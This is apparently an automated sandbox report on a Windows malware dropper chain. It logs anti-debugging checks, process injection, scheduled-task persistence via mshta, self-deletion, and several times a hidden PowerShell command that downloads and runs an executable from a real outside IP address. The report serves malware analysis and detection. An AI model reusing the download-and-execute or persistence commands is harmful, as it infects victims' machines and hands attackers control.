                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_00415FF2 mov eax, dword ptr fs:[00000030h]14_2_00415FF2
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0043C04C mov eax, dword ptr fs:[00000030h]17_2_0043C04C
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00415E60 mov eax, dword ptr fs:[00000030h]17_2_00415E60
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]17_2_00401000
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0043C0B2 mov eax, dword ptr fs:[00000030h]17_2_0043C0B2
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00664CE8 mov eax, dword ptr fs:[00000030h]18_2_00664CE8
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009804F2 GetProcessHeap,13_2_009804F2
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess token adjusted: Debug
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0096A1A5
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096A308 SetUnhandledExceptionFilter,13_2_0096A308
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0096EB6D
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009698B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_009698B8
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0040A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040A1A5
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0040A308 SetUnhandledExceptionFilter,14_2_0040A308
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0040EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040EB6D
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_004098B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_004098B8
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00672622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00672622
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0066083F
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006609D5 SetUnhandledExceptionFilter,18_2_006609D5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00660C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00660C21
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeMemory protected: page guard

                                      HIPS / PFW / Operating System Protection Evasion

                                      barindex
                                      Yara detected Powershell download and execute
                                      Source: Yara matchFile source: amsi32_2520.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi64_8000.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi32_3204.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: amsi32_6248.amsi.csv, type: OTHER
                                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7256, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2520, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5916, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                                      Contains functionality to inject code into remote processes
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00948070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,13_2_00948070
                                      Injects a PE file into a foreign processes
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeMemory written: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe base: 400000 value starts with: 4D5A
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,18_2_006A1201
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00682BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,18_2_00682BA5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AB226 SendInput,keybd_event,18_2_006AB226
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,18_2_006C22DA
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" "Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeProcess created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE "C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\J9hHfTRUK.hta"
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeProcess created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                      Source: C:\Windows\System32\mshta.exeProcess created: unknown unknown
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,18_2_006A0B62
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,18_2_006A1663
                                      Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                      Source: 8e933e9d51.exeBinary or memory string: Shell_TrayWnd
                                      Source: rapes.exe, rapes.exe, 00000003.00000002.1046903594.000000000043B000.00000040.00000001.01000000.00000007.sdmp, TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1637933726.000000000036B000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: /iProgram Manager
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096A38F cpuid 13_2_0096A38F
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: EnumSystemLocalesW,13_2_009820C8
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: EnumSystemLocalesW,13_2_009781BC
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: EnumSystemLocalesW,13_2_009821AE
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: EnumSystemLocalesW,13_2_00982113
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00982239
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetLocaleInfoW,13_2_0098248C
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_009825B2
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetLocaleInfoW,13_2_009826B8
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetLocaleInfoW,13_2_009786DE
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00982787
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_00981E26
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: EnumSystemLocalesW,14_2_004220C8
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: EnumSystemLocalesW,14_2_00422113
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: EnumSystemLocalesW,14_2_004221AE
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: EnumSystemLocalesW,14_2_004181BC
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_00422239
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetLocaleInfoW,14_2_0042248C
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_004225B2
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetLocaleInfoW,14_2_004186DE
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetLocaleInfoW,14_2_004226B8
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00422787
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,14_2_00421E26
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,17_2_0040CF60
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235930101\83f34278c7.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235950101\d101bd5267.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10235960101\718edcc992.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe VolumeInformationJump to behavior
